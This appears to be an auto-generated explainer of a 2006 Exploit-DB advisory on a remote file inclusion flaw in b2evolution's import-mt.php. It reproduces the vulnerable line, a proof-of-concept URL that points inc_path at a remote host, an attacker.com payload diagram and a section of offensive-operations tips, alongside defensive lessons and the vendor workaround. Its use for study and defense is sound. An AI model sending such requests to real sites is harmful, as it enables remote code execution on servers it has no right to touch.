By exploitdb papers bot•November 29, 2006•

papers

b2evolution 1.8.5 < 1.9b 'import-mt.php' Remote File Inclusion Explained

What this paper is

This paper details a Remote File Inclusion (RFI) vulnerability found in b2evolution versions 1.8.5 up to, but not including, 1.9 beta. The vulnerability exists in the import-mt.php script. An attacker can exploit this to include and execute arbitrary PHP code hosted on a remote server, provided certain PHP configurations are enabled on the victim's server.

Simple technical breakdown

The core of the problem lies in how the import-mt.php script handles user-supplied input for the $inc_path variable. This variable is used to construct a path to include other PHP files. If register_globals and allow_url_fopen are enabled in PHP, an attacker can manipulate $inc_path to point to a malicious PHP file on a remote server. The script then includes this remote file as if it were a local file, leading to code execution.

Complete code and payload walkthrough

The exploit paper itself does not contain the full source code of import-mt.php or the payload. It only shows a snippet of the relevant line and the Proof of Concept (PoC) URL.

Relevant Code Snippet from the Paper:

// Line 67 of import-mt.php (blogs/inc/CONTROL/imports):
require_once $inc_path.'MODEL/files/_file.funcs.php';

Explanation of the Snippet:

require_once $inc_path.'MODEL/files/_file.funcs.php';
- Purpose: This line attempts to include a PHP file named _file.funcs.php which is expected to be located within a MODEL/files/ subdirectory relative to the path specified by the $inc_path variable. The require_once construct ensures that the file is included only once, preventing redefinition errors.
- Inputs: The $inc_path variable.
- Behavior: It concatenates the value of $inc_path with the string 'MODEL/files/_file.funcs.php' and then attempts to include the resulting path.
- Output: If the file is successfully included, the code within it is executed. If not, a fatal error occurs.

Proof of Concept (PoC) URL:

http://<victim>/<b2epath>/inc/CONTROL/imports/import-mt.php?basepath=foo&inc_path=https://tiifp.org/tarkus/PoC/

Explanation of the PoC URL:

http://<victim>/<b2epath>/inc/CONTROL/imports/import-mt.php: This is the target script on the vulnerable b2evolution installation.
?basepath=foo: The basepath parameter is present but its direct exploitation is not detailed in the paper. It's likely a parameter that influences path construction or is simply ignored in this specific exploit.
&inc_path=https://tiifp.org/tarkus/PoC/: This is the critical parameter.
- Purpose: It overrides the default $inc_path variable.
- Behavior: When register_globals is On, user-supplied GET/POST parameters are automatically registered as global variables. Therefore, the value https://tiifp.org/tarkus/PoC/ is assigned to the $inc_path variable.
- Result: The require_once statement in the script will effectively become require_once 'https://tiifp.org/tarkus/PoC/MODEL/files/_file.funcs.php';.
- Prerequisites:
  - register_globals = On: This is crucial for the inc_path parameter to directly populate the $inc_path global variable.
  - allow_url_fopen = On: This PHP setting allows PHP to treat URLs as files, enabling require_once (and other file inclusion functions) to fetch content from remote locations.

Payload (Implied):

The attacker would host a PHP file (e.g., shell.php) on a server they control (e.g., https://tiifp.org/tarkus/PoC/). This shell.php file would contain malicious PHP code, such as a web shell, that executes commands on the victim's server.

The import-mt.php script, when processing the PoC URL, would then attempt to include https://tiifp.org/tarkus/PoC/MODEL/files/_file.funcs.php. If the attacker has placed a file named _file.funcs.php (or a file that the script would eventually try to include after further path manipulation) at that remote location, and that file contains malicious PHP code, that code will be executed on the victim's server.

Mapping list:

import-mt.php: The vulnerable script.
$inc_path: A variable used to specify the path for including other files.
require_once $inc_path.'MODEL/files/_file.funcs.php';: The vulnerable line that uses user-controlled input to construct a file path for inclusion.
?inc_path=https://tiifp.org/tarkus/PoC/: The exploit parameter that injects a remote URL into $inc_path.
register_globals = On: PHP configuration that makes GET/POST parameters global variables.
allow_url_fopen = On: PHP configuration that allows remote file inclusions.
Remote PHP file (e.g., shell.php): The attacker-controlled file containing the malicious payload.

Practical details for offensive operations teams

Required Access Level: Web server access with the ability to send HTTP requests. No prior authentication to the b2evolution application is typically required if the vulnerable script is accessible anonymously.
Lab Preconditions:
- A vulnerable b2evolution installation (1.8.5 to 1.9 beta).
- A target server with register_globals = On and allow_url_fopen = On enabled in its PHP configuration. These are often default settings on older PHP versions but are considered insecure and have been deprecated/removed in modern PHP.
- An attacker-controlled server capable of hosting a PHP payload and responding to HTTP requests.
Tooling Assumptions:
- A web browser or an HTTP request tool (e.g., curl, Burp Suite, OWASP ZAP) to craft and send the exploit request.
- A simple web server (e.g., Python's http.server, Apache, Nginx) to host the malicious PHP payload.
Execution Pitfalls:
- PHP Configuration: The exploit is entirely dependent on register_globals and allow_url_fopen being enabled. If either is Off, the exploit will fail. Modern PHP versions (5.3+) have these disabled by default.
- Firewall/WAF: Network firewalls or Web Application Firewalls (WAFs) might block outgoing HTTP requests from the victim server to the attacker's server, or incoming requests to the vulnerable script.
- Path Traversal/Sanitization: While this specific exploit leverages RFI directly, some applications might have additional sanitization layers that could prevent the URL from being used as a direct path. However, the paper implies direct use.
- Payload File Naming: The attacker needs to ensure their remote file is named correctly or that the target script's inclusion logic can be manipulated to include the attacker's file. The paper suggests the remote file would be placed at https://tiifp.org/tarkus/PoC/MODEL/files/_file.funcs.php or a similar structure.
- URL Encoding: Special characters in URLs might need proper encoding.
Expected Telemetry:
- Victim Server:
  - Web server access logs showing requests to import-mt.php with the inc_path parameter.
  - PHP error logs if the remote file cannot be fetched or if there are syntax errors in the payload.
  - Network logs showing outgoing HTTP requests from the victim server to the attacker's server on port 80 or 443.
  - Process execution logs if the payload executes system commands.
- Attacker Server:
  - Web server access logs showing requests from the victim's IP address to the hosted PHP payload.

Where this was used and when

Context: This vulnerability was found in b2evolution, a web blogging platform. It would be exploited against websites running this specific version of b2evolution.
Approximate Years/Dates: The paper was published on November 29, 2006. The vulnerability was reported to the vendor on November 10, 2006. Therefore, this exploit was relevant around 2006.

Defensive lessons for modern teams

Disable register_globals: This is a critical security setting that has been deprecated and removed in modern PHP versions. It should always be disabled.
Disable allow_url_fopen: While sometimes necessary for legitimate functionality, it significantly increases the risk of RFI. If required, strict controls and input validation must be in place. Modern applications should avoid relying on this.
Input Validation and Sanitization: Never trust user input. Always validate and sanitize any data received from external sources, especially when it's used in file paths, database queries, or executed as code.
Use Secure Inclusion Practices: When including files, use relative paths from a known, trusted base directory. Avoid using user-supplied input directly in include, require, include_once, or require_once statements.
Keep Software Updated: Regularly update web applications and their underlying frameworks (like b2evolution) to patch known vulnerabilities.
Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts.
Secure PHP Configuration: Ensure PHP is configured securely, disabling dangerous features and enabling security-related logging.

ASCII visual (if applicable)

This vulnerability is a classic example of how user input can directly influence file inclusion.

+-----------------+     +------------------------------------+     +----------------------+
| Attacker Server | --> | Victim Server (b2evolution)        | --> | Attacker's Payload   |
| (Hosts payload) |     | (Vulnerable import-mt.php)         |     | (e.g., shell.php)    |
+-----------------+     +------------------------------------+     +----------------------+
        ^                       |
        |                       |  HTTP Request with
        |                       |  inc_path=http://attacker.com/payload.php
        |                       v
        |     +------------------------------------+
        |     | PHP Interpreter on Victim Server   |
        |     | - register_globals=On              |
        |     | - allow_url_fopen=On               |
        |     +------------------------------------+
        |                       |
        |                       |  require_once('http://attacker.com/payload.php...')
        |                       v
        +-----------------------+------------------------------------+
                                |  PHP Interpreter fetches and       |
                                |  executes the remote payload       |
                                +------------------------------------+

Source references

Paper URL: https://www.exploit-db.com/papers/2864
Raw Exploit URL: https://www.exploit-db.com/raw/2864
Vendor: b2evolution (http://b2evolution.net/)
Author: tarkus (tarkus (at) tiifp (dot) org)

Original Exploit-DB Content (Verbatim)

Severity: High
 Title: b2evolution Remote File inclusion Vulnerability
 Date: 28.11.06
 Author: tarkus (tarkus (at) tiifp (dot) org)
 Web: https://tiifp.org/tarkus
 Vendor: b2evolution (http://b2evolution.net/)
 Affected Product(s): b2evolution 1.8.5 - 1.9 beta
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Description:
------------

Line 67 of import-mt.php (blogs/inc/CONTROL/imports):

>
>require_once $inc_path.'MODEL/files/_file.funcs.php';
>



PoC:
----

http://<victim>/<b2epath>/inc/CONTROL/imports/import-mt.php?basepath=foo&inc_path=https://tiifp.org/tarkus/PoC/

register_globals and allow_url_fopen have to be On


Workaround:
-----------

Put the following line at the beginning of the file.

if( !defined('EVO_MAIN_INIT') ) die( 'Please, do not access this page \
directly.' );



Vendor Response:
----------------

Reported to Vendor:     10.11.06
Vendor response:        10.11.06
Patch in CVS:           10.11.06

# milw0rm.com [2006-11-29]